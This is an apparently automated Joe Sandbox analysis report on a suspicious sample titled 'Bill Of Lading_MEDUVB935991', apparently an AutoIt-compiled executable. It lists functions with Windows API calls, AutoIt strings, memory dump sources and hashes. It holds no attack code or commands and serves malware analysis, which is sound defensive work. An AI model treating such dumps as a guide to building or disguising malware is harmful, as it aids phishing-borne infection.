                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction ID: 1b27aff6e64f89232993224e93e306ec7bce5b3dc7d4e714c295d9280e73077f
                                                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction Fuzzy Hash: 14019278A01119EFCB44DFA8C6909AEF7F5FB48310F208699DC09A7741D734AE41DB80
                                                                                                                      Function 040238C8 Relevance: .0, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction ID: 49235fcf1df2cd308370c6d394f215495e797babb7e4ed3217430afe590910d1
                                                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction Fuzzy Hash: 03018078A10219EFCB48DFA8C6909AEF7F5FB48310F208599DC19A7745D734AE41DB80
                                                                                                                      Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                      • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                      • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                      • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                      Function 04022278 Relevance: .0, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                      Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                      • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                      • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                      • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                      • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                      • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                      • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                      • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                      • _wcslen.LIBCMT ref: 00459800
                                                                                                                      • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                      • GetDC.USER32(?), ref: 004598DE
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                      • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 4040870279-2373415609
                                                                                                                      • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                      • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                      • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                      • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                      Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                                      • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                                      • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                                      • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                                        • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                        • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                        • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                        • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                        • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                        • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                        • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                        • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                        • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                        • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                        • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                        • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                        • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69173610-0
                                                                                                                      • Opcode ID: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                                                                                                      • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                      • Opcode Fuzzy Hash: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                                                                                                      • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                                      Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-3360698832
                                                                                                                      • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                      • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                      • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                      • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                      Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                      • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                      • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                      • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                      • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                      • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                      • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1582027408-0
                                                                                                                      • Opcode ID: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                                                                                                      • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                      • Opcode Fuzzy Hash: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                                                                                                      • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                      Function 0046AEAF Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 417registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AFC2
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,004848E8,00000000,?,00000000,?,?,?,?,?), ref: 0046B01C
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B069
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseConnectCreateRegistry
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 3217815495-966354055
                                                                                                                      • Opcode ID: 337752338d31dd93b2f835fa9ebc931d7674a1ff19a551d1bb3dd8001be44ee6
                                                                                                                      • Instruction ID: d9d2404220d166b11353d33fb52652cf6d28829cdaa3b272cf204d1a2c990fb8
                                                                                                                      • Opcode Fuzzy Hash: 337752338d31dd93b2f835fa9ebc931d7674a1ff19a551d1bb3dd8001be44ee6
                                                                                                                      • Instruction Fuzzy Hash: 2CE1A1B1600300ABD710EF65C885F1BB7E8AF48704F14895EB945DB392D778E945CBAA
                                                                                                                      Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                      • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                      • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                      • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                      • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                      • String ID: ($,$tooltips_class32
                                                                                                                      • API String ID: 541082891-3320066284
                                                                                                                      • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                      • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                      • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                      • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                      Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                      • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                      • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                      • _wcslen.LIBCMT ref: 00454E04
                                                                                                                      • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                      • _wcslen.LIBCMT ref: 00454E24
                                                                                                                      • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                        • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                      • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                      • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                      • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 2511167534-1154884017
                                                                                                                      • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                      • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                      • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                      • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                      Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                      • _wcslen.LIBCMT ref: 00436B79
                                                                                                                      • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                      • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
